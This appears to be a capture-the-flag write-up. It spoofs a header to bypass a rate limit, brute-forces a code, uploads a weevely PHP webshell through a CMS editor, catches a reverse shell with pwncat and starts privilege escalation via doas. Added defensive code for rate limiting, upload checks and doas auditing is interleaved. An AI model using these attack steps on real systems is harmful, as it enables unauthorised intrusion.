```text
# Nmap 7.91 scan initiated Sat Jan 23 14:28:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.95.187
Nmap scan report for 10.10.95.187
Host is up (0.099s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
|   256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
|_  256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open  http    Gunicorn 20.0.4
| http-methods:
|_  Supported Methods: HEAD POST GET OPTIONS
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 23 14:29:23 2021 -- 1 IP address (1 host up) scanned in 74.06 seconds
```
I observed that adding an X-Remote-Addr: 127.0.0.1 header removed the X-RateLimit-xxx headers
from the response.
Now we can try to brute-force the number. I launched the Burp Suite Intruder
and started from 10000 to 99999 with a step of 1, and stopped after a number
returned a 1136-byte response instead of the 1166-byte one.
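The observation above (a loopback X-Remote-Addr makes the rate-limit headers disappear) is what happens when a limiter exempts the local host but identifies the client by a header the client itself controls. The following is an added example, not code from the writeup or from the service on the target: it puts that weak client key beside a hardened one that only trusts the TCP peer address, or the last X-Forwarded-For hop appended by our own reverse proxy. All requests are constructed dicts, nothing touches the network, and the proxy address in TRUSTED_PROXIES is an assumption for the example.

```python
"""Added example (not from the writeup): a rate limiter keyed on a
client-controlled header beside one keyed on an address the client cannot
choose. Every request is a constructed dict; TRUSTED_PROXIES is assumed."""
from collections import defaultdict

LIMIT = 5                        # requests admitted per client key
EXEMPT = {"127.0.0.1"}           # e.g. local health checks skip the limit
TRUSTED_PROXIES = {"10.0.0.2"}   # assumed address of our own reverse proxy


class RateLimiter:
    def __init__(self, limit=LIMIT):
        self.limit = limit
        self.counts = defaultdict(int)

    def allow(self, key):
        """True while the client identified by `key` is within the limit."""
        if key in EXEMPT:
            return True
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def client_key_weak(request):
    # Weak: X-Remote-Addr is whatever the client sent, so anyone can claim
    # to be 127.0.0.1 and fall into the exemption.
    return request["headers"].get("X-Remote-Addr", request["peer"])


def client_key_hardened(request):
    # Hardened: use the TCP peer address. Only when the peer is our own
    # proxy do we look at X-Forwarded-For, and then only at the last hop,
    # which that proxy appended itself; anything the client put earlier in
    # the list (or in any other header) is ignored.
    peer = request["peer"]
    if peer in TRUSTED_PROXIES:
        raw = request["headers"].get("X-Forwarded-For", "")
        hops = [h.strip() for h in raw.split(",") if h.strip()]
        if hops:
            return hops[-1]
    return peer


def make_requests(n, peer="203.0.113.7", spoof=False):
    """Constructed traffic: n requests from one peer, optionally carrying
    the spoofed X-Remote-Addr: 127.0.0.1 header."""
    headers = {"X-Remote-Addr": "127.0.0.1"} if spoof else {}
    return [{"peer": peer, "headers": dict(headers)} for _ in range(n)]


def admitted(requests, key_fn):
    """Number of requests the limiter lets through under a given key function."""
    limiter = RateLimiter()
    return sum(1 for r in requests if limiter.allow(key_fn(r)))
```

With the weak key, twenty spoofed requests from one peer are all admitted; with the hardened key the same traffic stops at five, and a client that sends its own X-Forwarded-For directly (not through the proxy) is still keyed on its real peer address. The design point is that any exemption or allow-list is only as strong as the identifier it is checked against.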
Yay, it's a CMS overview page and the name of the CMS is in the footer.
Answer:
Mara
We can consult /<path>/sitemap.php to see all existing pages.
By browsing /<path>/about.php we can find the installed version (7.2), but it's
not the answer expected. I found another path with a changelog, /<path>/changes.txt,
and this one contains the right version.
Answer:
7.5
Also at /<path>/lorem.php there is a message:
Log in with admin and changeme to try the editor.
We can log in with the credentials at /<path>/lorem.php?login=admin.
We can upload files at /<path>/codebase/dir.php?type=filenew.
Let's create a PHP webshell and upload it:
```console
$ weevely generate noraj agent.php
Generated 'agent.php' with password 'noraj' of 761 byte size.
```
After upload we can see this message:
```text
Processing file upload request...
Please be patient, may take a while.
Do not close this window whilst upload is in progress.
Destination : /var/www/html/<path>/img
OK: agent.php uploaded.
Files saved to: /var/www/html/<path>/img
All files processed successfully
```
So my webshell is available at /<path>/img/agent.php.

```console
$ pwncat -l 9999 -vv
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.224.209:60632 (family 2/IPv4, TCP)
bash: cannot set terminal process group (1220): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-xenial:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
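The upload step above succeeds because the handler accepts a .php file from the client, keeps its name, and writes it under the document root where Apache executes it. As an added example that is not code from the writeup or from the CMS, here is the set of server-side checks that would have stopped that: a short extension allow-list, magic-byte verification of the content, a filename pattern that rejects double extensions and path components, a server-chosen stored name, and a storage directory outside the web root. STORE_DIR, the allow-list and the sample inputs are assumptions constructed for the example.

```python
"""Added example (not from the writeup or the CMS): hardened upload checks.
STORE_DIR and ALLOWED_MAGIC are assumptions; inputs in use are constructed."""
import os
import re
import secrets

# Allowed extensions and the magic bytes each file must start with.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024
# Assumed location outside the document root: the web server never executes
# files from here, and serves them (if at all) through a handler.
STORE_DIR = "/srv/app/uploads"

# One base name and one short lowercase extension: "shell.php.png" fails.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([a-z0-9]{1,4})")


def check_upload(filename, data):
    """Return (True, ext) if the upload is acceptable, else (False, reason)."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    # Keep only the final path component so '../' in the client-supplied
    # name cannot steer the file anywhere else.
    base = os.path.basename(filename.replace("\\", "/"))
    m = NAME_RE.fullmatch(base)
    if not m:
        return False, "bad filename"
    ext = m.group(1)
    if ext not in ALLOWED_MAGIC:
        return False, "extension not allowed"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"
    return True, ext


def stored_path(ext):
    """Server-chosen name: the client's filename is never reused on disk."""
    return os.path.join(STORE_DIR, f"{secrets.token_hex(16)}.{ext}")


def handle_upload(filename, data):
    """Validate, then return (path, None) for where the file would be written
    or (None, reason). The actual write is left out so the example has no
    side effects when run."""
    ok, info = check_upload(filename, data)
    if not ok:
        return None, info
    return stored_path(info), None
```

Independently of the handler, the directory the CMS writes into (here /<path>/img under the document root) should have script execution disabled at the web-server level, for instance a `<Directory>` block with `php_admin_flag engine off` under mod_php, so that a validation bug does not immediately become code execution.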
Elevation of Privilege (EoP): from www-data to kiran
Right now we can't read the user flag:
```console
www-data@ubuntu-xenial:/home/kiran$ ls -lhA
total 20K
-rw------- 1 kiran kiran    0 Dec  9 12:29 .bash_history
drwx------ 2 kiran kiran 4.0K Dec  9 04:31 .cache
drwxr-x--- 3 kiran kiran 4.0K Dec  6 18:08 .config
drwx------ 2 kiran kiran 4.0K Dec  6 18:09 .gnupg
-rw-r--r-- 1 kiran kiran  670 Dec  9 06:51 .profile
-r-------- 1 kiran kiran   33 Dec  9 11:07 user.txt
```
There is a hint saying to check for backups, but for some reason the find
command is forbidden.
I checked the backup directory:
```console
www-data@ubuntu-xenial:/var/www$ ls -lhA /var/backups
total 628K
-r--r--r-- 1 root root   1.7K Dec  6 13:19 .bak.passwd
-rw-r--r-- 1 root root    50K Dec  6 06:25 alternatives.tar.0
-rw-r--r-- 1 root root   6.2K Dec  9 06:46 apt.extended_states.0
-rw-r--r-- 1 root root    715 Dec  6 17:08 apt.extended_states.1.gz
-rw-r--r-- 1 root root    509 Nov 12 19:53 dpkg.diversions.0
-rw-r--r-- 1 root root    207 Dec  6 06:01 dpkg.statoverride.0
-rw-r--r-- 1 root root   535K Dec  6 06:19 dpkg.status.0
-rw------- 1 root root    849 Dec  6 06:17 group.bak
-rw------- 1 root shadow  714 Dec  6 06:17 gshadow.bak
-rw------- 1 root root   1.7K Dec  6 13:19 passwd.bak
-rw------- 1 root shadow 1.1K Dec  6 06:17 shadow.bak
```
I tried a find command to enumerate SUID binaries, but it didn't work, and which
is weirdly unable to find the binary. Calling the absolute path, I get
a permission denied.
So any user except www-data & kiran can use the binary.
By looking for a SUID binary manually I found there was doas in
/usr/local/bin, so we can check the configuration in /usr/local/etc/doas.conf
instead of /etc/doas.conf.
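Two things an administrator would want to check here: which doas.conf a given doas binary actually reads (a doas built under /usr/local does not look at /etc/doas.conf, so a tidy /etc copy proves nothing), and which rules in that file hand out more than intended. The following is an added example, not from the writeup and not part of doas: it derives the expected config path from the binary's prefix and parses doas.conf rules (`permit|deny [options] identity [as target] [cmd command [args ...]]`), flagging permit rules with nopass, rules with no cmd restriction, and keepenv. SAMPLE_CONF is a constructed configuration rather than the one on the target, the prefix-to-config mapping is an assumption about a source-built doas, and the parser assumes spaces around the braces of a setenv block.

```python
"""Added example (not from the writeup, not doas code): doas.conf auditor.
SAMPLE_CONF is constructed; the prefix -> config mapping is an assumption."""
import os
import shlex

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

SAMPLE_CONF = """\
# constructed sample doas.conf for this example
permit persist :wheel
permit nopass alice as root cmd /usr/bin/systemctl args restart nginx
permit nopass keepenv backup as root
deny nobody
"""


def expected_conf_path(binary):
    """Config a doas installed under a prefix reads (assumed convention:
    <prefix>/etc/doas.conf, with the /usr prefix reading /etc). A setuid
    doas in /usr/local/bin therefore ignores /etc/doas.conf entirely."""
    prefix = os.path.dirname(os.path.dirname(binary))
    if prefix in ("/usr", "/"):
        return "/etc/doas.conf"
    return os.path.join(prefix, "etc", "doas.conf")


def parse_rule(line):
    """Parse one doas.conf line into a dict; None for blank/comment lines."""
    toks = shlex.split(line, comments=True)
    if not toks:
        return None
    if toks[0] not in ("permit", "deny"):
        raise ValueError(f"unknown action in rule: {line!r}")
    rule = {"action": toks[0], "options": set(), "setenv": [],
            "identity": None, "target": None, "cmd": None, "args": None}
    i = 1
    # Options come first: nopass, nolog, persist, keepenv, setenv { ... }
    while i < len(toks):
        if toks[i] in OPTIONS:
            rule["options"].add(toks[i])
            i += 1
        elif toks[i] == "setenv":
            i += 1
            if i >= len(toks) or toks[i] != "{":
                raise ValueError(f"setenv without '{{': {line!r}")
            i += 1
            while i < len(toks) and toks[i] != "}":
                rule["setenv"].append(toks[i])
                i += 1
            i += 1  # skip the closing brace
        else:
            break
    if i >= len(toks):
        raise ValueError(f"rule has no identity: {line!r}")
    rule["identity"] = toks[i]          # a user, or :group
    i += 1
    if i < len(toks) and toks[i] == "as":
        if i + 1 >= len(toks):
            raise ValueError(f"'as' without target: {line!r}")
        rule["target"] = toks[i + 1]
        i += 2
    if i < len(toks) and toks[i] == "cmd":
        if i + 1 >= len(toks):
            raise ValueError(f"'cmd' without command: {line!r}")
        rule["cmd"] = toks[i + 1]
        i += 2
        if i < len(toks) and toks[i] == "args":
            # 'args' with nothing after it means the command takes no arguments;
            # no 'args' keyword at all means any arguments are allowed.
            rule["args"] = toks[i + 1:]
            i = len(toks)
    if i != len(toks):
        raise ValueError(f"trailing tokens in rule: {line!r}")
    return rule


def audit(conf_text):
    """Return (line_no, tag, message) findings for the risky permit rules."""
    findings = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        rule = parse_rule(line)
        if rule is None or rule["action"] != "permit":
            continue
        who, target = rule["identity"], rule["target"] or "root"
        if "nopass" in rule["options"]:
            findings.append((n, "nopass", f"{who} runs as {target} with no password"))
        if rule["cmd"] is None:
            findings.append((n, "any-cmd", f"{who} may run any command as {target}"))
        elif rule["args"] is None:
            findings.append((n, "any-args", f"{who} may pass any arguments to {rule['cmd']}"))
        if "keepenv" in rule["options"]:
            findings.append((n, "keepenv", f"{who} keeps its environment when running as {target}"))
    return findings
```

Run against the constructed SAMPLE_CONF, the auditor flags the unrestricted `:wheel` rule, the nopass rule for alice (which is otherwise tight because it pins both the command and its arguments), and all three problems on the backup rule. When reviewing a real host, feed it the file returned by expected_conf_path for each setuid doas found, not just /etc/doas.conf.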